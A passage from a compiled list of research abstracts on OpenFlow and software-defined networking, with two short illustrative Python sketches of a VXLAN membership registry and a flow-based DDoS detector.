a centralized controller that manages the admittance and routing of flows. While radical, this design is backwards-compatible with existing hosts and switches. We have implemented Ethane in both hardware and software, supporting both wired and wireless hosts. Our operational Ethane network has supported over 300 hosts for the past four months in a large university network, and this deployment experience has significantly affected Ethane's design. --- paper_title: A safe, efficient update protocol for openflow networks paper_content: We describe a new protocol for updating OpenFlow networks, which has the packet consistency condition of [?] and a weak form of the flow consistency condition of [?]. The protocol conserves switch resources, particularly TCAM space, by ensuring that only a single set of rules is present on a switch at any time.
The protocol exploits the identity of switch rules with Boolean functions, and the ability of any switch to send packets to a controller for routing. When a network changes from one ruleset (ruleset 1) to another (ruleset 2), the packets affected by the change are computed, and are sent to the controller. When all switches have been updated to send affected packets to the controller, ruleset 2 is sent to the switches and packets sent to the controller are re-released into the network. --- paper_title: Prototyping Fast, Simple, Secure Switches for Ethane paper_content: We recently published our proposal for Ethane: a clean-slate approach to managing and securing enterprise networks. The goal of Ethane is to make enterprise networks (e.g. networks in companies, universities, and home offices) much easier to manage. Ethane is built on the premise that the only way to manage and secure networks is to make sure we can identify the origin of all traffic, and hold someone (or some machine) accountable for it. So first, Ethane authenticates every human, computer and switch in the network, and tracks them at all times. Every packet can be immediately identified with its sender. Second, Ethane implements a network-wide policy language in terms of users, machines and services. Before a flow is allowed into the network, it is checked against the policy. Ethane requires two substantial changes to the network: Network switches and routers are replaced with much simpler switches, which are based on flow tables. The switch doesn't learn addresses, doesn't run spanning tree or routing protocols, and holds no access control lists. All it does is permit or deny flows under the control of a central controller. The controller is the second big change. Each network contains a central controller that decides if a flow is to be allowed into the network. It makes its decisions based on a set of rules that make up a policy. One premise of Ethane is that although the network is much more powerful as a whole, the switches are much simpler than conventional switches and routers. To explore whether this is true, we built 4-port Ethane switches in dedicated hardware (on the NetFPGA platform), running at 1Gb/s per port. We have deployed the switches in our network at Stanford University, and demonstrated that despite the simplicity of the switches, Ethane can support a very feature-rich and easy-to-manage network. --- paper_title: A management method of IP multicast in overlay networks using openflow paper_content: Overlay networks stretch a Layer 2 network and increase the mobility of virtual machines. VXLAN (Virtual eXtensible LAN) is one of the Layer 2 overlay schemes over a Layer 3 network proposed in the IETF, and its definition covers 16M overlay networks or segments, which overcomes the 4K limitation of VLANs. However, VXLAN uses IP multicast for the isolation of network traffic by tenant in the shared network infrastructure. IP multicast requires a great amount of resources, such as IP multicast table entries and CPU, so scalability is limited by the handling of IP multicast. We propose to manage IP multicast in overlay networks using OpenFlow instead of using a dynamic registration protocol such as IGMP. We describe our implementations of the VXLAN controller, an edge switch with a VXLAN gateway, and an OpenFlow switch. Our method using OpenFlow eliminates periodic Join/Leave messages and achieves more than 4k tenants in our Layer 2 network at server edges, which was not possible before.
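Illustration (ours): the key idea of the VXLAN management abstract above, replacing IGMP joins with controller state, amounts to the controller keeping a VNI-to-VTEP membership table and handing each edge switch its replication list. The class below is a hypothetical sketch of that bookkeeping; names, VNIs and addresses are invented.

from collections import defaultdict

class TenantRegistry:
    # Controller-side bookkeeping that replaces IGMP joins: the controller
    # already knows which VTEP hosts which tenant, so it can hand each edge
    # switch the exact set of peer VTEPs to replicate BUM traffic to.
    def __init__(self):
        self.vni_to_vteps = defaultdict(set)

    def vm_started(self, vni, vtep_ip):
        self.vni_to_vteps[vni].add(vtep_ip)

    def vm_stopped(self, vni, vtep_ip):
        self.vni_to_vteps[vni].discard(vtep_ip)

    def replication_list(self, vni, local_vtep):
        # Peers a given VTEP must copy broadcast/unknown traffic to.
        return sorted(self.vni_to_vteps[vni] - {local_vtep})

reg = TenantRegistry()
reg.vm_started(5001, "192.0.2.1")
reg.vm_started(5001, "192.0.2.2")
reg.vm_started(5002, "192.0.2.3")
print(reg.replication_list(5001, "192.0.2.1"))   # ['192.0.2.2']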
--- paper_title: Outsourcing network functionality paper_content: This paper presents an architecture for adding functionality to networks via outsourcing. In this model, the enterprise network only forwards data; any additional processing is performed by external Feature Providers (FPs). FPs provide and manage features, scaling and moving them in response to customer demand, and providing automated recovery in case of failure. Benefits to the enterprise include reduced cost and management complexity, improved features through FP specialization, and increased choice in services. Central to the model are a policy component and a Feature API (FAPI). Policy is specified with features not locations, enabling features to be located anywhere. FAPI enables communication between enterprise and FP control planes to share policy and configure features. We have built a prototype implementation of this architecture called Jingling. Our prototype system incorporates a nation-wide backbone network and FPs located in six sites around the United States. --- paper_title: Openflow random host mutation: transparent moving target defense using software defined networking paper_content: Static configurations serve great advantage for adversaries in discovering network targets and launching attacks. Identifying active IP addresses in a target domain is a precursory step for many attacks. Frequently changing hosts' IP addresses is a novel proactive moving target defense (MTD) that hides network assets from external/internal scanners. In this paper, we use OpenFlow to develop a MTD architecture that transparently mutates host IP addresses with high unpredictability and rate, while maintaining configuration integrity and minimizing operation overhead. The presented technique is called OpenFlow Random Host Mutation (OF-RHM) in which the OpenFlow controller frequently assigns each host a random virtual IP that is translated to/from the real IP of the host. The real IP remains untouched, so IP mutation is completely transparent for end-hosts. Named hosts are reachable via the virtual IP addresses acquired via DNS, but real IP addresses can be only reached by authorized entities. Our implementation and evaluation show that OF-RHM can effectively defend against stealthy scanning, worm propagation, and other scanning-based attack. --- paper_title: Splendid isolation: a slice abstraction for software-defined networks paper_content: The correct operation of many networks depends on keeping certain kinds of traffic isolated from others, but achieving isolation in networks today is far from straightforward. To achieve isolation, programmers typically resort to low-level mechanisms such as Virtual LANs, or they interpose complicated hypervisors into the control plane. This paper presents a better alternative: an abstraction that supports programming isolated slices of the network. The semantics of slices ensures that the processing of packets on a slice is independent of all other slices. We define our slice abstraction precisely, develop algorithms for compiling slices, and illustrate their use on examples. In addition, we describe a prototype implementation and a tool for automatically verifying formal isolation properties. --- paper_title: OMNI: OpenFlow MaNagement Infrastructure paper_content: Managing computer networks is challenging because of the numerous monitoring variables and the difficulty to autonomously configure network parameters. 
This paper presents the OpenFlow MaNagement Infrastructure (OMNI), which helps the administrator to control and manage OpenFlow networks by providing remote management based on a web interface. OMNI provides flow monitoring and dynamic flow configuration through a service-oriented architecture. OMNI also offers an Application Programming Interface (API) for collecting data and configuring the OpenFlow network. We propose a multi-agent system based on OMNI API that reduces packet loss rates. We evaluate both the OMNI management applications and the multi-agent system performance using a testbed. Our results show that the multi-agent system detects and reacts to a packet-loss condition in less than three monitoring intervals. --- paper_title: Hierarchical policies for software defined networks paper_content: Hierarchical policies are useful in many contexts in which resources are shared among multiple entities. Such policies can easily express the delegation of authority and the resolution of conflicts, which arise naturally when decision-making is decentralized. Conceptually, a hierarchical policy could be used to manage network resources, but commodity switches, which match packets using flow tables, do not realize hierarchies directly. This paper presents Hierarchical Flow Tables (HFT), a framework for specifying and realizing hierarchical policies in software defined networks. HFT policies are organized as trees, where each component of the tree can independently determine the action to take on each packet. When independent parts of the tree arrive at conflicting decisions, HFT resolves conflicts with user-defined conflict-resolution operators, which exist at each node of the tree. We present a compiler that realizes HFT policies on a distributed network of OpenFlow switches, and prove its correctness using the Coq proof assistant. We then evaluate the use of HFT to improve performance of networked applications. --- paper_title: Dynamic graph query primitives for SDN-based cloudnetwork management paper_content: The need to provide customers with the ability to configure the network in current cloud computing environments has motivated the Networking-as-a-Service (NaaS) systems designed for the cloud. Such systems can provide cloud customers access to virtual network functions, such as network-aware VM placement, real time network monitoring, diagnostics and management, all while supporting multiple device management protocols. These network management functionalities depend on a set of underlying graph primitives. In this paper, we present the design and implementation of the software architecture including a shared graph library that can support network management operations. Using the illustrative case of all pair shortest path algorithm, we demonstrate how scalable lightweight dynamic graph query mechanisms can be implemented to enable practical computation times, in presence of network dynamism. --- paper_title: Source address validation solution with OpenFlow/NOX architecture paper_content: Current Internet is lack of validation on source IP address, resulting in many security threats. The future Internet can face the similar routing locator spoofing problem without careful design. The current in-progress source address validation standard, i.e., SAVI, is not of enough protection due to the solution space constraint. In this article, a mechanism named VAVE is proposed to improve the SAVI solutions. 
VAVE employs OpenFlow protocol, which provides the de facto standard network innovation interface, to solve source address validation problem with a global view. Significant improvements can be found from our evaluation results. --- paper_title: Openflow random host mutation: transparent moving target defense using software defined networking paper_content: Static configurations serve great advantage for adversaries in discovering network targets and launching attacks. Identifying active IP addresses in a target domain is a precursory step for many attacks. Frequently changing hosts' IP addresses is a novel proactive moving target defense (MTD) that hides network assets from external/internal scanners. In this paper, we use OpenFlow to develop a MTD architecture that transparently mutates host IP addresses with high unpredictability and rate, while maintaining configuration integrity and minimizing operation overhead. The presented technique is called OpenFlow Random Host Mutation (OF-RHM) in which the OpenFlow controller frequently assigns each host a random virtual IP that is translated to/from the real IP of the host. The real IP remains untouched, so IP mutation is completely transparent for end-hosts. Named hosts are reachable via the virtual IP addresses acquired via DNS, but real IP addresses can be only reached by authorized entities. Our implementation and evaluation show that OF-RHM can effectively defend against stealthy scanning, worm propagation, and other scanning-based attack. --- paper_title: Splendid isolation: a slice abstraction for software-defined networks paper_content: The correct operation of many networks depends on keeping certain kinds of traffic isolated from others, but achieving isolation in networks today is far from straightforward. To achieve isolation, programmers typically resort to low-level mechanisms such as Virtual LANs, or they interpose complicated hypervisors into the control plane. This paper presents a better alternative: an abstraction that supports programming isolated slices of the network. The semantics of slices ensures that the processing of packets on a slice is independent of all other slices. We define our slice abstraction precisely, develop algorithms for compiling slices, and illustrate their use on examples. In addition, we describe a prototype implementation and a tool for automatically verifying formal isolation properties. --- paper_title: Lightweight DDoS flooding attack detection using NOX/OpenFlow paper_content: Distributed denial-of-service (DDoS) attacks became one of the main Internet security problems over the last decade, threatening public web servers in particular. Although the DDoS mechanism is widely understood, its detection is a very hard task because of the similarities between normal traffic and useless packets, sent by compromised hosts to their victims. This work presents a lightweight method for DDoS attack detection based on traffic flow features, in which the extraction of such information is made with a very low overhead compared to traditional approaches. This is possible due to the use of the NOX platform which provides a programmatic interface to facilitate the handling of switch information. Other major contributions include the high rate of detection and very low rate of false alarms obtained by flow analysis using Self Organizing Maps. 
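Illustration (ours): a flow-feature pipeline in the spirit of the DDoS detection abstract above, periodically summarising flow counters into a small feature vector. The exact feature set and the trained Self-Organizing Map belong to the original work; the field names and the threshold rule below are only stand-ins so the sketch runs end to end.

def flow_features(flows):
    # Summarise a batch of flow-table counters into per-flow averages plus the
    # fraction of flows that have a matching reverse flow (one-way floods have few).
    n = max(len(flows), 1)
    avg_pkts  = sum(f["packets"] for f in flows) / n
    avg_bytes = sum(f["bytes"] for f in flows) / n
    avg_dur   = sum(f["duration_s"] for f in flows) / n
    pair_flows = sum(1 for f in flows
                     if any(g["src"] == f["dst"] and g["dst"] == f["src"] for g in flows))
    return [avg_pkts, avg_bytes, avg_dur, pair_flows / n]

def looks_like_flood(features, pkt_thresh=3.0, pair_thresh=0.2):
    # Placeholder decision rule standing in for the trained SOM classifier.
    avg_pkts, _, _, pair_ratio = features
    return avg_pkts < pkt_thresh and pair_ratio < pair_thresh

flows = [{"src": "198.51.100.%d" % i, "dst": "203.0.113.9",
          "packets": 2, "bytes": 120, "duration_s": 0.4} for i in range(100)]
print(looks_like_flood(flow_features(flows)))   # True: many tiny one-way flows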
--- paper_title: Design of the multi-level security network switch system which restricts covert channel paper_content: The administrator must implement a multilevel security policy in a multilevel security network system. The policy must allow information to flow from a low-level host to hosts at the same or a higher level, and prevent information from flowing from a high-level host to a low-level host, but a traditional network has difficulty meeting this requirement. This paper proposes a design for a multi-level security network switch system. The design adds a module named Filter based on OpenFlow. OpenFlow can control the packet flows in the network, and the Filter can check packet contents and delay packets, thereby restricting covert channels. Using OpenFlow and the Filter, the system can implement the multilevel security policy in a local area network scenario. The experiment verified the feasibility of the design. --- paper_title: Enabling fast failure recovery in OpenFlow networks paper_content: OpenFlow is a novel technology designed at Stanford University which aims at decoupling the controller software from the forwarding hardware of a router or switch. The OpenFlow concept is based on the approach that the forwarding information base (FIB) of a switch can be programmed via a controller which resides on separate hardware. The goal is to provide a standardized open management interface to the forwarding hardware of a router or switch. The aim of the SPARC project (“SPlit ARchitecture Carrier grade networks”) is to deploy OpenFlow in carrier grade networks. Reliability is a major issue for deploying OpenFlow in these networks. This work proposes the addition of a fast restoration mechanism in OpenFlow and evaluates the performance by comparing the switchover time and packet loss to existing restoration options in a current OpenFlow implementation. --- paper_title: Openflow-based server load balancing gone wild paper_content: Today's data centers host online services on multiple servers, with a front-end load balancer directing each client request to a particular replica. Dedicated load balancers are expensive and quickly become a single point of failure and congestion. The OpenFlow standard enables an alternative approach where the commodity network switches divide traffic over the server replicas, based on packet-handling rules installed by a separate controller. However, the simple approach of installing a separate rule for each client connection (or "microflow") leads to a huge number of rules in the switches and a heavy load on the controller. We argue that the controller should exploit switch support for wildcard rules for a more scalable solution that directs large aggregates of client traffic to server replicas. We present algorithms that compute concise wildcard rules that achieve a target distribution of the traffic, and automatically adjust to changes in load-balancing policies without disrupting existing connections. We implement these algorithms on top of the NOX OpenFlow controller, evaluate their effectiveness, and propose several avenues for further research. --- paper_title: Software defined networking: Meeting carrier grade requirements paper_content: Software Defined Networking is a networking paradigm which allows network operators to manage networking elements using software running on an external server. This is accomplished by a split in the architecture between the forwarding element and the control element.
Two technologies which allow this split for packet networks are For CES and Openflow. We present energy efficiency and resilience aspects of carrier grade networks which can be met by Openflow. We implement flow restoration and run extensive experiments in an emulated carrier grade network. We show that Openflow can restore traffic quite fast, but its dependency on a centralized controller means that it will be hard to achieve 50 ms restoration in large networks serving many flows. In order to achieve 50 ms recovery, protection will be required in carrier grade networks. --- paper_title: A security enforcement kernel for OpenFlow networks paper_content: Software-defined networks facilitate rapid and open innovation at the network control layer by providing a programmable network infrastructure for computing flow policies on demand. However, the dynamism of programmable networks also introduces new security challenges that demand innovative solutions. A critical challenge is efficient detection and reconciliation of potentially conflicting flow rules imposed by dynamic OpenFlow (OF) applications. To that end, we introduce FortNOX, a software extension that provides role-based authorization and security constraint enforcement for the NOX OpenFlow controller. FortNOX enables NOX to check flow rule contradictions in real time, and implements a novel analysis algorithm that is robust even in cases where an adversarial OF application attempts to strategically insert flow rules that would otherwise circumvent flow rules imposed by OF security applications. We demonstrate the utility of FortNOX through a prototype implementation and use it to examine performance and efficiency aspects of the proposed framework. --- paper_title: VeriFlow: verifying network-wide invariants in real time paper_content: Networks are complex and prone to bugs. Existing tools that check configuration files and data-plane state operate offline at timescales of seconds to hours, and cannot detect or prevent bugs as they arise. Is it possible to check network-wide invariants in real time, as the network state evolves? The key challenge here is to achieve extremely low latency during the checks so that network performance is not affected. In this paper, we present a preliminary design, VeriFlow, which suggests that this goal is achievable. VeriFlow is a layer between a software-defined networking controller and network devices that checks for network-wide invariant violations dynamically as each forwarding rule is inserted. Based on an implementation using a Mininet OpenFlow network and Route Views trace data, we find that VeriFlow can perform rigorous checking within hundreds of microseconds per rule insertion. --- paper_title: On the Flexibility of MPLS Applications over an OpenFlow-Enabled Network paper_content: In today's networks, a node usually has a static role that cannot be easily changed without an expensive upgrade. In MPLS architecture, despite the flexible forwarding data plane not tied to a single forwarding technology, each MPLS node has to be dedicated for a specific role depending on its position in the edge or the core of the MPLS network domain. This paper proposes an approach to address the flexibility of an MPLS node to play multiple roles for different MPLS domains built on top of an underlying OpenFlow-enabled physical network. 
The pipelined approach through tables introduced in the version 1.1 and later of the OpenFlow specification allows the change of the packet processing behavior by just updating the memory structures -- such as the TCAM and hash tables. It exploits the power of the OpenFlow rules-based paradigm to demonstrate the high level programmability to achieve the deossification of an MPLS infrastructure. In order to validate our proposal, we have implemented our approach over a 100Gbps switch box built on network processors and tested it with three applications to evaluate its flexibility. The results show that the local software to hardware update of a Label Switched Path (LSP) can be made in 2.2ms, in average, and the deployment of a Label Switched Router (LSR) application with 400 labels takes only 392.5ms. --- paper_title: Unifying Packet and Circuit Switched Networks paper_content: There have been many attempts to unify the control and management of circuit and packet switched networks, but none have taken hold. In this paper we propose a simple way to unify both types of network using OpenFlow. The basic idea is that a simple flow abstraction fits well with both types of network, provides a common paradigm for control, and makes it easy to insert new functionality into the network. OpenFlow provides a common API to the underlying hardware, and allows all of the routing, control and management to be defined in software outside the datapath. --- paper_title: Integrated OpenFlow — GMPLS control plane: An overlay model for software defined packet over optical networks paper_content: A novel software-defined packet over optical networks solution based on the OpenFlow and GMPLS control plane integration is demonstrated. The proposed architecture, experimental setup, and average flow setup time for different optical flows is reported. --- paper_title: OpenFlow MPLS and the open source label switched router paper_content: Multiprotocol Label Switching (MPLS) [3] is a protocol widely used in commercial operator networks to forward packets by matching link-specific labels in the packet header to outgoing links rather than through standard IP longest prefix matching. However, in existing networks, MPLS is implemented by full IP routers, since the MPLS control plane protocols such as LDP [8] utilize IP routing to set up the label switched paths, even though the MPLS data plane does not require IP routing. OpenFlow 1.0 is an interface for controlling a routing or switching box by inserting flow specifications into the box's flow table [1]. While OpenFlow 1.0 does not support MPLS1, MPLS label-based forwarding seems conceptually a good match with OpenFlow's flow-based routing paradigm. In this paper we describe the design and implementation of an experimental extension of OpenFlow 1.0 to support MPLS. The extension allows an OpenFlow switch without IP routing capability to forward MPLS on the data plane. We also describe the implementation of a prototype open source MPLS label switched router, based on the NetFPGA hardware platform [4], utilizing OpenFlow MPLS. The prototype is capable of forwarding data plane packets at line speed without IP forwarding, though IP forwarding is still used on the control plane. We provide some performance measurements comparing the prototype to software routers. 
The measurements indicate that the prototype is an appropriate tool for achieving line speed forwarding in testbeds and other experimental networks where flexibility is a key attribute, as a substitute for software routers. --- paper_title: Packet and circuit network convergence with OpenFlow paper_content: IP and Transport networks are controlled and operated independently today, leading to significant Capex and Opex inefficiencies for the providers. We discuss a unified approach with OpenFlow, and present a recent demonstration of a unified control plane for OpenFlow enabled IP/Ethernet and TDM switched networks. --- paper_title: Application-aware aggregation and traffic engineering in a converged packet-circuit network paper_content: We demonstrate a converged OpenFlow enabled packet-circuit network, where circuit flow properties (guarantee d bandwidth, low latency, low jitter, bandwidth-on-demand, fast recovery) provide differential treatment to dynamically aggregated packet flows for voice, video and web traffic. --- paper_title: MPLS with a simple OPEN control plane paper_content: We propose a new approach to MPLS that uses the standard MPLS data plane and an OpenFlow based simpler and extensible control plane. We demonstrate this approach using a prototype system for MPLS Traffic Engineering. --- paper_title: Why OpenFlow/SDN can succeed where GMPLS failed paper_content: OpenFlow & Software Defined Networking (SDN) ideas offer drastically reduced complexity in the control plane, increased programmability and extensibility, and a gradual adoption path; all significant advantages over GMPLS for dynamic interaction between packet and circuit networks. --- paper_title: Enabling the future optical Internet with OpenFlow: A paradigm shift in providing intelligent optical network services paper_content: This paper proposes an optical networking paradigm suitable for future Internet services enabled by OpenFlow. The OpenFlow technology supports the programmability of network functions and protocols by separating the data plane and the control plane, which are currently vertically integrated in routers and switches. OpenFlow facilitates fundamental changes in the behaviour of networks and their associated protocols. This paper introduces an OpenFlow optical network architecture enabled by optical flow, optical flow switching elements and programmable OpenFlow controllers. The proposed solution allows intelligent, user controlled and programmable optical network service provisioning with the capability to operate any user defined network protocol and scenario. --- paper_title: MPLS-TE and MPLS VPNS with openflow paper_content: We demonstrate MPLS Traffic Engineering (MPLS-TE) and MPLS-based Virtual Private Networks (MPLS VPNs) using OpenFlow [1] and NOX [6]. The demonstration is the outcome of an engineering experiment to answer the following questions: How hard is it to implement a complex control plane on top of a network controller such as NOX? Does the global vantage point in NOX make the implementation easier than the traditional method of implementing it on every switch, embedded in the data plane? We implemented every major feature of MPLS-TE and MPLS-VPN in just 2,000 lines of code, compared to much larger lines of code in the more traditional approach, such as Quagga-MPLS. Because NOX maintains a consistent, up-to-date topology map, the MPLS control plane features are quite simple to implement. 
And its simplicity makes it easy to extend: We have easily added several new features; something a network operator could do to customize their network to meet their customers' needs. The demo consists of two parts: MPLS-TE services and then MPLS VPN driven by a GUI. --- paper_title: Hedera: Dynamic Flow Scheduling for Data Center Networks paper_content: Today's data centers offer tremendous aggregate bandwidth to clusters of tens of thousands of machines. However, because of limited port densities in even the highest-end switches, data center topologies typically consist of multi-rooted trees with many equal-cost paths between any given pair of hosts. Existing IP multipathing protocols usually rely on per-flow static hashing and can cause substantial bandwidth losses due to long-term collisions. In this paper, we present Hedera, a scalable, dynamic flow scheduling system that adaptively schedules a multi-stage switching fabric to efficiently utilize aggregate network resources. We describe our implementation using commodity switches and unmodified hosts, and show that for a simulated 8,192 host data center, Hedera delivers bisection bandwidth that is 96% of optimal and up to 113% better than static load-balancing methods. --- paper_title: An inter-AS routing component for software-defined networks paper_content: Network management is a challenging problem of wide impact with many enterprises suffering significant monetary losses, that can be of millions per hour, due to network issues, as downtime cost. The Software Defined Networks (SDN) approach is a new paradigm that enables the management of networks with low cost and complexity. The SDN architecture consists of a control plane, a forwarding plane and a protocol that enables communication with both planes. The control plane is composed by an Operating System and applications that run on top of it. The forwarding plane contains the switches, routers, and other network equipment. Nowadays, inter-domain routing system presents some critical problems, mainly due to its fully distributed model. Recent research has showed that it would be beneficial to apply the SDN approach to address some of those problems. But it became necessary to build a new mechanism to allow inter-domain routing using SDN. The aim of this paper is to present an inter-domain routing solution using a NOX-OpenFlow architecture, based on some characteristics of the today largely used inter-domain protocol, keeping the SDN architectural principles. Although NOX-OpenFlow was originally created for routing only in enterprise networks, we propose routing beyond those, lifting this undesirable restriction of the original architecture. Our tests show that the built of this kind of application provides a much less complex, less prone to errors, and scalable solution. --- paper_title: Unifying Packet and Circuit Switched Networks paper_content: There have been many attempts to unify the control and management of circuit and packet switched networks, but none have taken hold. In this paper we propose a simple way to unify both types of network using OpenFlow. The basic idea is that a simple flow abstraction fits well with both types of network, provides a common paradigm for control, and makes it easy to insert new functionality into the network. OpenFlow provides a common API to the underlying hardware, and allows all of the routing, control and management to be defined in software outside the datapath.
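The Hedera entry above contrasts static per-flow hashing over equal-cost paths with dynamic flow scheduling. As a rough, self-contained illustration of that contrast (the four-path topology, the capacities, the flow demands, and the greedy "first fit" placement below are invented for this sketch and are not Hedera's actual algorithms or implementation), a short Python example:

# Toy comparison of ECMP-style static hashing versus greedy flow placement
# over equal-cost paths. Illustrative only; not Hedera's implementation.

PATHS = ["p0", "p1", "p2", "p3"]   # four equal-cost paths (hypothetical)
CAPACITY = 10.0                    # per-path capacity (hypothetical units)
FLOWS = [("f1", 6.0), ("f2", 6.0), ("f3", 6.0), ("f4", 6.0)]  # (id, demand)

def static_hashing(flows, paths):
    """Pick each flow's path from a hash of its id; Python randomizes string
    hashes per process, which here stands in for arbitrary ECMP hashing."""
    load = {p: 0.0 for p in paths}
    for fid, demand in flows:
        load[paths[hash(fid) % len(paths)]] += demand
    return load

def greedy_first_fit(flows, paths, capacity):
    """Place each flow on the first path that still has room for its demand,
    falling back to the least-loaded path when none does."""
    load = {p: 0.0 for p in paths}
    for fid, demand in flows:
        fitting = [p for p in paths if load[p] + demand <= capacity]
        chosen = fitting[0] if fitting else min(paths, key=lambda p: load[p])
        load[chosen] += demand
    return load

if __name__ == "__main__":
    print("static hashing  :", static_hashing(FLOWS, PATHS))
    print("greedy first fit:", greedy_first_fit(FLOWS, PATHS, CAPACITY))

With these numbers, hash-based selection can land two 6-unit flows on the same 10-unit path while another path sits idle, which is the long-term collision problem the abstract describes; the greedy pass avoids it by consulting current path load before placing each flow.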
--- paper_title: Application-aware aggregation and traffic engineering in a converged packet-circuit network paper_content: We demonstrate a converged OpenFlow enabled packet-circuit network, where circuit flow properties (guaranteed bandwidth, low latency, low jitter, bandwidth-on-demand, fast recovery) provide differential treatment to dynamically aggregated packet flows for voice, video and web traffic. --- paper_title: MPLS with a simple OPEN control plane paper_content: We propose a new approach to MPLS that uses the standard MPLS data plane and an OpenFlow based simpler and extensible control plane. We demonstrate this approach using a prototype system for MPLS Traffic Engineering. --- paper_title: Carving research slices out of your production networks with OpenFlow paper_content: OpenFlow [4] has been demonstrated as a way for researchers to run networking experiments in their production network. Last year, we demonstrated how an OpenFlow controller running on NOX [3] could move VMs seamlessly around an OpenFlow network [1]. While OpenFlow has potential [2] to open control of the network, only one researcher can innovate on the network at a time. What is required is a way to divide, or slice, network resources so that researchers and network administrators can use them in parallel. Network slicing implies that actions in one slice do not negatively affect other slices, even if they share the same underlying physical hardware. A common network slicing technique is VLANs. With VLANs, the administrator partitions the network by switch port and all traffic is mapped to a VLAN by input port or explicit tag. This coarse-grained type of network slicing complicates more interesting experiments such as IP mobility or wireless handover. Here, we demonstrate FlowVisor, a special purpose OpenFlow controller that allows multiple researchers to run experiments safely and independently on the same production OpenFlow network. To motivate FlowVisor’s flexibility, we demonstrate four network slices running in parallel: one slice for the production network and three slices running experimental code (Figure 1). Our demonstration runs on real network hardware deployed on our production network at Stanford and a wide-area test-bed with a mix of wired and wireless technologies. --- paper_title: Delivering capacity for the mobile internet by stitching together networks paper_content: Despite of findings that only 5.2% of the spectrum from 30 MHz to 3 GHz is utilized, there is much talk of an impending spectrum crisis. This is no contradiction - spectrum is inefficiently utilized, with some part of the spectrum being heavily used while others barely used. In this paper, we explore a simple high-level approach to the problem: to enable user mobility across networks and exploit all the capacity available. By doing so, we can create a better mobile network by stitching together existing ones spanning multiple wireless technologies. We briefly outline our exploratory foray into radio agnostic handover and discuss the various challenges ahead. --- paper_title: PhoneNet: a phone-to-phone network for group communication within an administrative domain paper_content: This paper proposes PhoneNet, an application framework to support direct group communication among phones without relay nodes. PhoneNet presents the familiar abstraction of a multi-user chat service to application writers.
It performs two main functions: inviting participants to the chat room and routing data between participants directly without going through any intermediaries. Made possible by a generic chat room service embedded in the network itself, all application-specific code in PhoneNet applications runs on the phones themselves. Unlike the conventional server-client model, this design does not require scalable central servers that can handle all simultaneous interactions. As a first step, we have created a prototype of PhoneNet that works within an administrative domain. The multicast functionality among phones is implemented on top of a software-defined network (SDN). We have developed two applications using PhoneNet: teleconferencing and photo-sharing. Our experience suggests that it is easy to develop PhoneNet applications and PhoneNet appears to be effective in reducing network traffic. --- paper_title: Towards programmable enterprise WLANS with Odin paper_content: We present Odin, an SDN framework to introduce programmability in enterprise wireless local area networks (WLANs). Enterprise WLANs need to support a wide range of services and functionalities. This includes authentication, authorization and accounting, policy, mobility and interference management, and load balancing. WLANs also exhibit unique challenges. In particular, access point (AP) association decisions are not made by the infrastructure, but by clients. In addition, the association state machine combined with the broadcast nature of the wireless medium requires keeping track of a large amount of state changes. To this end, Odin builds on a light virtual AP abstraction that greatly simplifies client management. Odin does not require any client side modifications and its design supports WPA2 Enterprise. With Odin, a network operator can implement enterprise WLAN services as network applications. A prototype implementation demonstrates Odin's feasibility. --- paper_title: The Stanford OpenRoads deployment paper_content: We have built and deployed OpenRoads [11], a testbed that allows multiple network experiments to be conducted concurrently in a production network. For example, multiple routing protocols, mobility managers and network access controllers can run simultaneously in the same network. In this paper, we describe and discuss our deployment of the testbed at Stanford University. We focus on the challenges we faced deploying in a production network, and the tools we built to overcome these challenges. Our goal is to gain enough experience for other groups to deploy OpenRoads in their campus network. --- paper_title: Blueprint for introducing innovation into wireless mobile networks paper_content: In the past couple of years we've seen quite a change in the wireless industry: Handsets have become mobile computers running user-contributed applications on (potentially) open operating systems. It seems we are on a path towards a more open ecosystem; one that has been previously closed and proprietary. The biggest winners are the users, who will have more choice among competing, innovative ideas. The same cannot be said for the wireless network infrastructure, which remains closed and (mostly) proprietary, and where innovation is bogged down by a glacial standards process. Yet as users, we are surrounded by abundant wireless capacity and multiple wireless networks (WiFi and cellular), with most of the capacity off-limits to us. 
It seems industry has little incentive to change, preferring to hold onto control as long as possible, keeping an inefficient and closed system in place. This paper is a "call to arms" to the research community to help move the network forward on a path to greater openness. We envision a world in which users can move freely between any wireless infrastructure, while providing payment to infrastructure owners, encouraging continued investment. We think the best path to get there is to separate the network service from the underlying physical infrastructure, and allow rapid innovation of network services, contributed by researchers, network operators, equipment vendors and third party developers. We propose to build and deploy an open - but backward compatible - wireless network infrastructure that can be easily deployed on college campuses worldwide. Through virtualization, we allow researchers to experiment with new network services directly in their production network. --- paper_title: OpenRadio: a programmable wireless dataplane paper_content: We present OpenRadio, a novel design for a programmable wireless dataplane that provides modular and declarative programming interfaces across the entire wireless stack. Our key conceptual contribution is a principled refactoring of wireless protocols into processing and decision planes. The processing plane includes directed graphs of algorithmic actions (eg. 54Mbps OFDM WiFi or special encoding for video). The decision plane contains the logic which dictates which directed graph is used for a particular packet (eg. picking between data and video graphs). The decoupling provides a declarative interface to program the platform while hiding all underlying complexity of execution. An operator only expresses decision plane rules and corresponding processing plane action graphs to assemble a protocol. The scoped interface allows us to build a dataplane that arguably provides the right tradeoff between performance and flexibility. Our current system is capable of realizing modern wireless protocols (WiFi, LTE) on off-the-shelf DSP chips while providing flexibility to modify the PHY and MAC layers to implement protocol optimizations. --- paper_title: OpenRoads: empowering research in mobile networks paper_content: We present OpenRoads, an open-source platform for innovation in mobile networks. OpenRoads enable researchers to innovate using their own production networks, through providing an wireless extension OpenFlow. Therefore, you can think of OpenRoads as "OpenFlow Wireless". The OpenRoads' architecture consists of three layers: flow, slicing and controller. These layers provide flexible control, virtualization and high-level abstraction. This allows researchers to implement wildly different algorithms and run them concurrently in one network. OpenRoads also incorporates multiple wireless technologies, specifically WiFi and WiMAX. We have deployed OpenRoads, and used it as our production network. Our goal here is for those to deploy OpenRoads and build their own experiments on it. --- paper_title: OpenFlow control for cooperating AQM scheme paper_content: OpenFlow is defined as a unified control plane and architecture for packet and circuit switched networks. We deal with the congestion control problem in the multi-layer network, and propose a cooperative congestion control scheme for a domain with multiple AQM routers based on the OpenFlow architecture. 
